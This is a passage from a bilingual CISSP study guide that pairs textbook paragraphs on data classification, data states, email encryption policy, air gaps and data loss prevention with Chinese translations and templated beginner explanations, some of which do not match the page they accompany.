result in significant losses to an organization. However, basic security practices, such as properly marking, handling, storing, and destroying data and hardware assets based on classifications, helps prevent losses. Defining Asset Classifications Asset classifications should match the data classifications. In other words, if a computer is processing top secret data, the computer should also be classified as a top secret asset. Similarly, if media such as internal or external drives hold top secret data, the media should also be classified as top secret.

It is common to use clear marking on the hardware assets so that personnel are reminded of data that can be processed or stored on the asset. For example, if a computer is used to process top secret data, the computer and the monitor will have clear and prominent labels reminding users of the classification of data that can be processed on the computer. Understanding Data States It's important to protect data in all data states, including while it is at rest, in transit, and in use. Data at Rest Data at rest (sometimes called data on storage) is any data stored on media such as system hard drives, solid-state drives (SSDs), external USB drives, storage area networks (SANs), and backup tapes.

Strong symmetric encryption protects data at rest. Data in Transit Data in transit (sometimes called data in motion or being communicated) is any data being transmitted over a network. This includes data being transmitted over an internal network using wired or wireless methods and data being transmitted over public networks such as the Internet. A combination of symmetric and asymmetric encryption protects data in transit. Data in Use Data in use (also known as data being processed) refers to data in memory or temporary storage buffers while an application is using it. Applications often decrypt encrypted data before placing it in memory.

This allows the application to work on it, but it's important to flush these buffers when the data is no longer needed. In some cases, it's possible for an application to work on encrypted data using homomorphic encryption. This limits the risk because memory doesn't hold unencrypted data.

中文直译 / 整理

组织遭受重大损失。 然而,基本的安全实践,例如根据分类正确标记、处理、 存储和销毁数据及硬件资产,有助于防止损失。 定义资产分类 资产分类应与数据分类相匹配。 换句话说,如果一台计算机正在处理绝密数据, 则该计算机也应被分类为绝密资产。 同样,如果介质(如内部或外部驱动器) 存储了绝密数据,则这些介质也应被分类为绝密。 通常会在硬件资产上使用清晰的标识,以提醒人员注意该资产可处理或存储 的数据。 例如,如果一台计算机用于处理绝密数据,则该计算机和显示器上 应有明显且醒目的标签,提醒用户该计算机可处理的数据类别。 理解数据状态 保护所有数据状态下的数据至关重要,包括数据处于静止、传输和使用状态时。 静止数据 静止数据(有时称为存储中的数据)是指存储在介质上的任何数据, 例如系统硬盘、固态硬盘(SSD)、外部USB驱动器、存储区域网络(SAN) 和备份磁带。 强对称加密可保护静止数据。 传输中的数据 传输中的数据(有时称为动态数据或通信中的数据)是指通过网 络传输的任何数据。 这包括通过有线或无线方式在内部网络中传输的数据,以及 通过互联网等公共网络传输的数据。 对称加密和非对称加密的结合可保护传输中 的数据。

使用中的数据 使用中的数据(也称为正在处理的数据)是指应用程序使用时处 于内存或临时存储缓冲区中的数据。 应用程序通常在将加密数据放入内存之前 先将其解密。 这使应用程序能够对其进行处理,但重要的是在数据不再需要时 清空这些缓冲区。 在某些情况下,应用程序可以使用同态加密直接处理加密数 据。 这降低了风险,因为内存中不会保存未加密的数据。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

数据分类:数据分类按敏感度和价值给数据贴等级,决定保护强度。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

分类由数据所有者决定,保护由保管者实施。

同一密钥、速度快、大数据加密常对应 symmetric。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
数据分类 数据分类按敏感度和价值给数据贴等级,决定保护强度。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
学习单元 09 / PDF P332

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

The best way to protect the confidentiality of data is to use strong encryption protocols, discussed extensively in Chapter 6, “Cryptography and Symmetric Key Algorithms.” Additionally, strong authentication and authorization controls help prevent unauthorized access. As an example, consider a web application that retrieves credit card data for quick access and reuse with the user's permission for an e-commerce transaction. The credit card data is stored in a database server and protected while at rest, while in transit, and while in use. Database administrators take steps to encrypt sensitive data stored in the database server (data at rest).

They would typically encrypt columns holding sensitive data such as credit card data. Additionally, they would implement strong authentication and authorization controls to prevent unauthorized entities from accessing the database. When the web application sends a request for data from the web server, the database server verifies that the web application is authorized to retrieve the data and, if so, the database server sends it. However, this entails several steps. For example, the database management system first retrieves and decrypts the data and formats it in a way that the web application can read it.

The database server then uses a transport encryption algorithm to encrypt the data before transmitting it. This ensures that the data in transit is secure. The web application server receives the data in an encrypted format. It decrypts the data and sends it to the web application. The web application stores the data in temporary memory buffers while it uses it to authorize the transaction. When the web application no longer needs the data, it takes steps to purge memory buffers, ensuring the complete removal of all residual sensitive data. The Identity Theft Resource Center (ITRC) routinely tracks data breaches.

They post reports through their website (http://idtheftcenter.org) that are free to anyone. In 2023, they tracked 3,205 data breaches, exposing the information of more than 353 million people. Determining Compliance Requirements

中文直译 / 整理

保护数据机密性的最佳方法是使用强加密协议,详见第6章,“加密与对称密 钥算法”。 此外,强大的身份验证和授权控制有助于防止未经授权的访问。 例如,考虑一个网页应用程序,该应用程序在获得用户许可的情况下,为电 子商务交易快速检索并重用信用卡数据。 信用卡数据存储在数据库服务器中, 并在静态、传输中和使用时受到保护。 数据库管理员采取措施加密存储在数据库服务器中的敏感数据(静态数据)。 他们通常会加密包含敏感数据(如信用卡数据)的列。 此外,他们会实施强 大的身份验证和授权控制,以防止未经授权的实体访问数据库。 当网页应用程序向Web服务器发送数据请求时,数据库服务器会验证该网页应 用程序是否有权检索数据,如果有,则发送数据。 然而,这涉及多个步骤。 例 如,数据库管理系统首先检索并解密数据,然后将其格式化为网页应用程序可 读的形式。 随后,数据库服务器使用传输加密算法对数据进行加密后再传输。 这确保了传输中的数据安全。 Web应用程序服务器以加密格式接收数据。 它解密数据并将其发送到Web应用 程序。 Web应用程序在使用数据授权交易时,将数据存储在临时内存缓冲区中。

当Web应用程序不再需要该数据时,它会采取措施清除内存缓冲区,确保彻底 删除所有残留的敏感数据。 身份盗窃资源中心(ITRC)定期追踪数据泄露事件。 他们通过其网 站(http://idtheftcenter.org)发布报告,任何人都可以免费获取。 2023年,他们追踪到3,205起数据泄露事件,导致超过3.53亿人的信息暴 露。 确定合规要求

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
学习单元 10 / PDF P333

第 333 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Every organization has a responsibility to learn what legal requirements apply to them and ensure they meet all the compliance requirements. This is especially important if an organization handles PII in different countries. Chapter 4, “Laws, Regulations, and Compliance,” covers a wide assortment of laws and regulations that apply to organizations around the world. For any organization involved in e-commerce, this can get complex very quickly. An important point to remember is that an organization needs to determine what laws apply to it. Imagine a group of college students work together and create an app that solves a problem for them.

On a whim, they start selling the app from the Apple App Store and it goes viral. People around the world are buying the app, bringing cash windfalls to these students. It also brings major headaches. Suddenly these college students need to be knowledgeable about laws around the world that apply to them. Some organizations have created a formal position called a compliance officer. The person filling this role ensures that the organization is conducting all business activities by following the laws and regulations that apply to the organization. Of course, this starts by first determining everywhere the organization operates and what compliance requirements apply.

Determining Data Security Controls After defining data and asset classifications, you must define the security requirements and identify security controls to implement those requirements. Imagine that your organization has decided to use the data labels Confidential/Proprietary, Private, Sensitive, and Public, as described earlier. Management then decides on a data security policy dictating the use of specific security controls to protect data in these categories. The policy will likely address data stored in files, in databases, on servers such as email servers, on user systems, sent via email, and stored in the cloud. For this example, we're limiting the type of data to email only.

Your organization has defined how it wants to protect email in each of the data categories. They've decided that any email in the Public category doesn't need to be encrypted. However, email in all other categories (Confidential/Proprietary, Private, and Sensitive) must be encrypted when being sent (data in transit) and while stored on an email server (data at rest).

中文直译 / 整理

每个组织都有责任了解适用于自身的法律要求,并确保满足所有合规要求。 如 果组织在不同国家处理个人身份信息(PII),这一点尤为重要。 第4章“法律、 法规与合规”涵盖了适用于全球组织的广泛法律和法规。 对于任何参与电子商 务的组织而言,情况可能迅速变得复杂。 需要牢记的重要一点是,组织需要确 定适用于自身的法律。 想象一群大学生合作开发了一款解决他们自身问题的应用程序。 一时兴起,他 们开始在苹果应用商店销售这款应用,结果迅速走红。 世界各地的人们纷纷购 买该应用,为这些学生带来了巨额现金收益。 但这同时也带来了诸多麻烦。 这 些大学生突然需要了解全球适用于他们的各种法律法规。 一些组织设立了正式的职位,称为合规官。 担任这一职位的人负责确保组织 的所有业务活动均遵循适用于该组织的法律法规。 当然,这首先需要明确组 织运营的地区范围以及适用的合规要求。 确定数据安全控制措施 在定义数据和资产分类后,您必须明确安全需求,并确定实现这些需求所需的 安全控制措施。 假设您的组织已决定使用之前描述的数据标签:机密/专有、私 有、敏感和公开。 随后,管理层制定了数据安全政策,规定使用特定的安全控 制措施来保护这些类别的数据。

该政策可能涵盖存储在文件、数据库、服务器 (如邮件服务器)、用户系统上的数据,以及通过电子邮件发送的数据和存储 在云端的数据。 在此示例中,我们将数据类型限制为仅电子邮件。 您的组织已定义了如何在每 个数据类别中保护电子邮件。 他们决定,公共类别中的任何电子邮件都不需要 加密。 然而,其他所有类别中的电子邮件 (机密/专有、私有和敏感)信息在传输过程中(数据在传输中)和存储在电子邮件服务 器上时(数据静态存储)必须进行加密。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 333 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
自主访问控制 DAC DAC 由对象所有者决定谁能访问。
学习单元 11 / PDF P334

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Encryption converts cleartext data into scrambled ciphertext and makes it more difficult to read. Using strong encryption methods such as the Advanced Encryption Standard with 256-bit keys (AES 256) makes it almost impossible for unauthorized personnel to read the text. Table 5.1 shows other security requirements for email that management has defined in their data security policy. Notice that data in the highest level of classification category (Confidential/Proprietary in this example) has the most security requirements defined in the security policy.

TABLE 5.1 Securing email data Classification Security requirements for email Confidential/Proprietary (highest level of protection for any data) Email and attachments must be encrypted with AES 256. Email and attachments remain encrypted except when viewed. Email can be sent only to recipients within the organization. Email can be opened and viewed only by recipients (forwarded emails cannot be opened). Attachments can be opened and viewed, but not saved. Email content cannot be copied and pasted into other documents. Email cannot be printed. Private (examples include PII and PHI) Email and attachments must be encrypted with AES 256. Email and attachments remain encrypted except when viewed.

Email can be sent only to recipients within the organization. Sensitive (lowest level of protection for classified data) Email and attachments must be encrypted with AES 256. Public Email and attachments can be sent in cleartext.

中文直译 / 整理

加密将明文数据转换为乱码的密文,使其更难以读取。 使用强加密方法,例如 采用256位密钥的高级加密标准(AES 256),可使未经授权的人员几乎无法读 取该文本。 表 5.1展示了管理层在其数据安全策略中为电子邮件定义的其他安全要求。 请 注意,最高分类级别(在此示例中为机密/专有)的数据在安全策略中定义了 最多的安全要求。 表 5.1 邮件数据保护 分类 邮件的安全要求 保密/专有 (对任何数据的最高级别保护) 邮件及其附件必须使用 AES 256 进行加密。 邮件和附件在查看时除外,其余时间保持加密 状态。 邮件只能发送给组织内部的收件人。 邮件只能由收件人打开和查看(转发的邮 件无法打开)。 附件可以打开和查看,但无法保存。 邮件内容无法复制并粘贴到其他文档中。 邮件无法打印。 私有(例如PII 和PHI) 电子邮件和附件必须使用AES 256加密。 电子邮件和附件在未查看时保持加密状态。 电子邮件只能发送给组织内的收件人。 敏感(最低级别 机密数据的保护) 电子邮件和附件必须使用AES 256加密。 公开 电子邮件和附件可以以明文发送。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
学习单元 12 / PDF P335

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

The requirements listed in Table 5.1 are provided as an example only. Any organization could use these requirements or define other requirements that work for them. Security administrators use the requirements defined in the security policy to identify security controls. For Table 5.1, the primary security control is strong encryption using AES 256. Administrators should identify methodologies, making it easy for employees to meet the requirements. Although it's possible to meet all the requirements for securing email shown in Table 5.1, doing so might require implementing other solutions.

For example, several software companies sell a range of products that organizations can use to automate these tasks. Users apply relevant labels (such as confidential, private, sensitive, and public) to emails before sending them. These emails pass through a data loss prevention (DLP) server that detects the labels and applies the required protection. The settings for these DLP solutions can be configured for an organization's specific needs. Table 5.1 shows possible requirements that your organization might want to apply to email. However, you shouldn't stop there. Any type of data that your organization wants to protect needs similar security definitions.

For example, you should define requirements for data stored on assets such as servers, data backups stored on-site and off-site, and proprietary data. Additionally, identity and access management security controls help ensure that only authorized personnel can access resources. Chapter 13, “Managing Identity and Authentication,” and Chapter 14, “Controlling and Monitoring Access,” cover identity and access management security controls in more depth. Establishing Information and Asset Handling Requirements A key goal of managing sensitive data is to prevent data breaches. A data breach is an event in which an unauthorized entity can view or access sensitive data.

If you pay attention to the news, you probably hear about data breaches quite often. Large data breaches such as the Marriott data breach of 2020 hit the mainstream news. Marriott reported that attackers stole

中文直译 / 整理

在表 5.1中列出的要求仅作为示例提供。 任何组织都可以使用这些要 求或定义适合自身的要求。 安全管理员使用安全策略中定义的要求来识别安全控制措施。 对于表5.1,主要 的安全控制措施是使用AES 256进行强加密。 管理员应识别相关方法,以便员 工轻松满足这些要求。 虽然可以满足表5.1中所示的所有电子邮件安全要求,但实现这些要求可能需 要部署其他解决方案。 例如,多家软件公司销售一系列产品,组织可以使用这 些产品来自动化这些任务。 用户在发送电子邮件前为其应用相关标签(如机密、 私有、敏感和公开)。 这些电子邮件会通过数据丢失防护(DLP)服务器,该 服务器检测标签并应用所需保护。 这些DLP解决方案的设置可根据组织的具体 需求进行配置。 表5.1列出了您的组织可能希望应用于电子邮件的可能要求。 然而,您不应止步 于此。 组织希望保护的任何类型数据都需要类似的安全定义。 例如,您应为存 储在服务器、本地和异地备份的数据以及专有数据等资产上的数据定义要求。 此外,身份和访问管理安全控制有助于确保只有授权人员才能访问资源。

第 13章,“管理身份和认证”,以及第14章,“控制和监控访问”,更深入地 介绍了身份和访问管理安全控制。 建立信息和资产处理要求 管理敏感数据的一个关键目标是防止数据泄露。 数据泄露是指未经授权的实体 能够查看或访问敏感数据。 如果你关注新闻,你可能经常听到数据泄露的报道。 像2020年万豪数据泄露这样的大型数据泄露事件曾登上主流新闻。 万豪报告称, 攻击者窃取了

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 13 / PDF P336

第 336 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

personal data, including names, addresses, email addresses, employer information, and phone numbers, of approximately 5.2 million guests. The following sections identify basic steps people within an organization should follow to limit the possibility of data breaches. Data Maintenance Data maintenance refers to ongoing efforts to organize and care for data throughout its lifetime. In general, if an organization stores all sensitive data on one server, it is relatively easy to apply all the appropriate controls to this one server.

In contrast, if sensitive data is stored throughout an organization on multiple servers and end-user computers and mixed with nonsensitive data, it becomes much harder to protect it. One option would be for one network to process only unclassified data while another network processes classified data. Techniques such as air gaps ensure the two networks never physically touch each other. An air gap is a physical security control and means that systems and cables from the classified network never physically touch systems and cables from the unclassified network. Additionally, the classified network can't access the Internet, and Internet attackers can't access it.

Still, there are times when personnel need to add data to the classified network, such as when devices, systems, and applications need updates. One way is manual; personnel copy the data from the unclassified network to a USB device and carry it to the classified network. Another method is to use a unidirectional network bridge; this connects the two networks but allows the data to travel in only one direction, from the unclassified network to the classified network. A third method is to use a technical guard solution, which is a combination of hardware and software placed between the two networks. A guard solution allows properly marked data to travel between the two networks.

Additionally, an organization should routinely review data policies to ensure that they are kept up-to-date and that personnel are following the policies. It's often a good practice to review the causes of recent data breaches and ensure that similar mistakes are not causing needless vulnerabilities. Data Loss Prevention

中文直译 / 整理

约520万位宾客的个人信息,包括姓名、地址、电子邮件地址、雇主信息和 电话号码。 以下部分列出了组织内人员应遵循的基本步骤,以降低数据泄露的可能性。 数据维护 数据维护是指在整个数据生命周期中持续进行的组织和维护工作。 通常情况下, 如果一个组织将所有敏感数据存储在一台服务器上,则相对容易对该服务器应 用所有适当的控制措施。 相反,如果敏感数据分散存储在组织内的多台服务器 和终端用户计算机上,并与非敏感数据混合,则保护这些数据将变得困难得多。 一种选择是,一个网络仅处理非机密数据,而另一个网络处理机密数据。 诸如 空气隔离等技术可确保这两个网络在物理上从未接触。 一个空气隔离是一种物 理安全控制措施,意味着机密网络的系统和电缆绝不会与非机密网络的系统和 电缆发生物理接触。 此外,机密网络无法访问互联网,互联网攻击者也无法访 问它。 然而,在某些情况下,人员需要将数据添加到机密网络中,例如当设备、系统 和应用程序需要更新时。 一种方法是手动操作:人员将数据从非机密网络复制 到USB设备,然后携带至机密网络。 另一种方法是使用单向网络网桥; 该方法 连接两个网络,但仅允许数据从非机密网络单向传输至机密网络。

第三种方法 是使用技术防护解决方案,即在两个网络之间部署的硬件和软件组合。 防护解 决方案允许经过正确标记的数据在两个网络之间传输。 此外,组织应定期审查数据策略,以确保其保持最新,并确保人员遵守这些策 略。 通常,审查近期数据泄露的原因并确保类似错误不会造成不必要的漏洞, 是一种良好的做法。 数据丢失防护

小白解释

场景先行:你是公司的安全负责人,正在读第 336 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 336 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 14 / PDF P337

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Data loss prevention (DLP) solutions attempt to detect and block data exfiltration attempts. These solutions have the capability of scanning unencrypted data looking for keywords and data patterns. For example, imagine that your organization uses data classifications of Confidential, Proprietary, Private, and Sensitive. A DLP system can scan files for these words and detect them. Pattern-matching DLP systems look for specific patterns. For example, U.S. Social Security numbers have a pattern of nnn-nn-nnnn (three numbers, a dash, two numbers, a dash, and four numbers). The DLP can look for this pattern and detect it.

Administrators can set up a DLP system to look for any patterns based on their needs. Cloud DLP solutions can look for the same keywords or patterns. There are three types of DLP solutions: Network DLP A network DLP scans all outgoing data in a traditional network looking for specific data. Administrators place it on the edge of the network to scan all data leaving the organization. If a user sends out a file containing restricted data, the DLP system will detect it and prevent it from leaving the organization. The DLP system will send an alert, such as an email to an administrator.

Endpoint DLP An endpoint DLP can scan files stored on a system as well as files sent to external devices, such as printers. For example, an organization's endpoint DLP can prevent users from copying sensitive data to USB flash drives or sending sensitive data to a printer. Administrators configure the DLP to scan the files with the appropriate keywords, and if it detects files with these keywords, it will block the copy or print job. It's also possible to configure an endpoint DLP solution to regularly scan files (such as on a file server) for files containing specific keywords or patterns, or even for unauthorized file types, such as MP3 files.

Cloud DLP Cloud DLP is a subset of network DLP designed and tailored for cloud-native environments. DLP solutions typically can perform deep-level examinations. For example, if users embed the files in compressed zip files, a DLP solution can still detect the keywords and patterns. However, a DLP solution can't decrypt data or examine encrypted data. Most DLP solutions also include discovery capabilities. The goal is to discover the location of valuable data within an internal network. When security

中文直译 / 整理

数据防泄漏(DLP) 解决方案旨在检测并阻止数据外泄行为。 这些解决方 案能够扫描未加密的数据,查找关键词和数据模式。 例如,假设您的组织 使用机密、专有、私有和敏感等数据分类。 DLP 系统可以扫描文件以查找 这些词语并加以识别。 模式匹配DLP系统会查找特定模式。 例如,美国社会保障号码的模式为 nnn‑nn‑nnnn(三位数字、一个连字符、两位数字、一个连字符和四位数字)。 DLP可以查找此模式并检测它。 管理员可以根据需要设置DLP系统以查找任何 模式。 云DLP解决方案可以查找相同的关键词或模式。 DLP解决方案有三种类型: 网络DLP 网络DLP会扫描传统网络中所有传出的数据,以查找特定数据。 管理 员将其部署在网络边缘,以扫描所有离开组织的数据。 如果用户发送包含受限数 据的文件,DLP系统将检测到并阻止其离开组织。 DLP系统会发送警报,例如向 管理员发送电子邮件。 终端DLP 终端DLP可以扫描存储在系统上的文件以及发送到外部设备(如打印 机)的文件。 例如,组织的终端DLP可以防止用户将敏感数据复制到USB闪存驱 动器或发送敏感数据到打印机。

管理员配置DLP以扫描包含适当关键词的文件, 如果检测到包含这些关键词的文件,它将阻止复制或打印任务。 还可以配置终端 DLP解决方案定期扫描文件(例如在文件服务器上),以查找包含特定关键词或 模式的文件,甚至查找未经授权的文件类型,如MP3文件。 Cloud DLP Cloud DLP 是专为云原生环境设计和定制的网络 DLP 的子集。 DLP 解决方案通常能够进行深度检查。 例如,如果用户将文件嵌入压缩的 zip 文件中,DLP 解决方案仍能检测到关键词和模式。 然而,DLP 解决方案无 法解密数据或检查加密数据。 大多数DLP解决方案还包含发现功能。 目标是发现内部网络中宝贵数据的位置。 当 安全

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

